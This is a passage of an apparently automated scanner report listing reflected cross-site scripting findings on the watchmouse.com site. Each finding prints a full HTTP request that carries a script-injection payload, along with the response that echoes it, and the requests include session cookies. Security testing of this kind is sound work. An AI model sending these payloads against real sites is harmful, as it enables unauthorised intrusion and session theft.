P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/?8e97e"><script>alert(1)</script>dfef8dfc3c2=1" method="post">
...[SNIP]...

1.60. http://www.watchmouse.com/de/feature/public-status-page.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/feature/public-status-page.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 965ce"><script>alert(1)</script>9d6c19c90c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /de965ce"><script>alert(1)</script>9d6c19c90c2/feature/public-status-page.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:32 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-29722c3d15dd84a5fb39b1b1944d51a7"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/de965ce"><script>alert(1)</script>9d6c19c90c2/feature/public-status-page.html" method="post">
...[SNIP]...

1.61. http://www.watchmouse.com/de/feature/public-status-page.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/feature/public-status-page.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1fd9"><script>alert(1)</script>01b2edc89ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/featuref1fd9"><script>alert(1)</script>01b2edc89ed/public-status-page.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:34 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-ba80288d1c13fc0a830740ea63bc5c6c"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/featuref1fd9"><script>alert(1)</script>01b2edc89ed/public-status-page.html" method="post">
...[SNIP]...

1.62. http://www.watchmouse.com/de/feature/public-status-page.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/feature/public-status-page.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be3b4"><script>alert(1)</script>f0266383555 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/feature/public-status-page.htmlbe3b4"><script>alert(1)</script>f0266383555 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:40 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-8644ea6d0f6042165712c989e6ca7708"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/feature/public-status-page.htmlbe3b4"><script>alert(1)</script>f0266383555" method="post">
...[SNIP]...

1.63. http://www.watchmouse.com/de/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8acce"><script>alert(1)</script>7186806a23a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /de8acce"><script>alert(1)</script>7186806a23a/feature/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:59 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-a483251fb53cc90294693a8f84643ae2"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/de8acce"><script>alert(1)</script>7186806a23a/feature/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.64. http://www.watchmouse.com/de/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9d2b"><script>alert(1)</script>03423c381c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/featuree9d2b"><script>alert(1)</script>03423c381c1/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:03 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-8d53818f897146fe01c9690472408ae5"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/featuree9d2b"><script>alert(1)</script>03423c381c1/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.65. http://www.watchmouse.com/de/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3cc6"><script>alert(1)</script>e6dfa6d7ef4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/feature/transaction-monitoring-web-application-testing.htmlc3cc6"><script>alert(1)</script>e6dfa6d7ef4 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:07 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-c6e51b4374e3493f7f1b15f1c8ad3ad6"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/feature/transaction-monitoring-web-application-testing.htmlc3cc6"><script>alert(1)</script>e6dfa6d7ef4" method="post">
...[SNIP]...

1.66. http://www.watchmouse.com/de/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/feature/transaction-monitoring-web-application-testing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77f5a"><script>alert(1)</script>a690508e1b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/feature/transaction-monitoring-web-application-testing.html?77f5a"><script>alert(1)</script>a690508e1b3=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:56 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-41e192f984b75a1677346841b9bc01be"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="/de/feature/transaction-monitoring-web-application-testing.html?77f5a"><script>alert(1)</script>a690508e1b3=1" method="post">
...[SNIP]...

1.67. http://www.watchmouse.com/de/learn_more.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/learn_more.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6776"><script>alert(1)</script>8f01e9a661e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /dee6776"><script>alert(1)</script>8f01e9a661e/learn_more.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:17 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b15e32332f1971fc52944f1b58313cce"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/dee6776"><script>alert(1)</script>8f01e9a661e/learn_more.php" method="post">
...[SNIP]...

1.68. http://www.watchmouse.com/de/learn_more.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/learn_more.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a845b"><script>alert(1)</script>3674185b0b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/learn_more.phpa845b"><script>alert(1)</script>3674185b0b1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:20 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-85198e259ee9aa4a11ad85851c189f93"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/learn_more.phpa845b"><script>alert(1)</script>3674185b0b1" method="post">
...[SNIP]...

1.69. http://www.watchmouse.com/de/learn_more.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/learn_more.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1db28"><script>alert(1)</script>d57baea6d54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/learn_more.php?1db28"><script>alert(1)</script>d57baea6d54=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:09:10 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 12:09:10 GMT
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/learn_more.php?1db28"><script>alert(1)</script>d57baea6d54=1" method="post">
...[SNIP]...

1.70. http://www.watchmouse.com/de/plans_price.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/plans_price.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f72d8"><script>alert(1)</script>094600cf9e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /def72d8"><script>alert(1)</script>094600cf9e0/plans_price.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:09 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-3266ed08f9bd73f312adb1cb7b2990d1"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/def72d8"><script>alert(1)</script>094600cf9e0/plans_price.php" method="post">
...[SNIP]...

1.71. http://www.watchmouse.com/de/plans_price.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/plans_price.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9724f"><script>alert(1)</script>b69cc004d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/plans_price.php9724f"><script>alert(1)</script>b69cc004d9 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-5f44d3fcacbfad0c4ac178e16512a965"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/plans_price.php9724f"><script>alert(1)</script>b69cc004d9" method="post">
...[SNIP]...

1.72. http://www.watchmouse.com/de/plans_price.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/plans_price.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdc88"><script>alert(1)</script>0395becefe6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/plans_price.php?bdc88"><script>alert(1)</script>0395becefe6=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:09:00 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-4a91ae575210e8129a2513cf548ba657"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/plans_price.php?bdc88"><script>alert(1)</script>0395becefe6=1" method="post">
...[SNIP]...

1.73. http://www.watchmouse.com/de/register.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/register.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4770"><script>alert(1)</script>b1bfa4f784d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /def4770"><script>alert(1)</script>b1bfa4f784d/register.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:34 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f45316343b67e401bef4babfda3fa7f8"
Content-Language: en
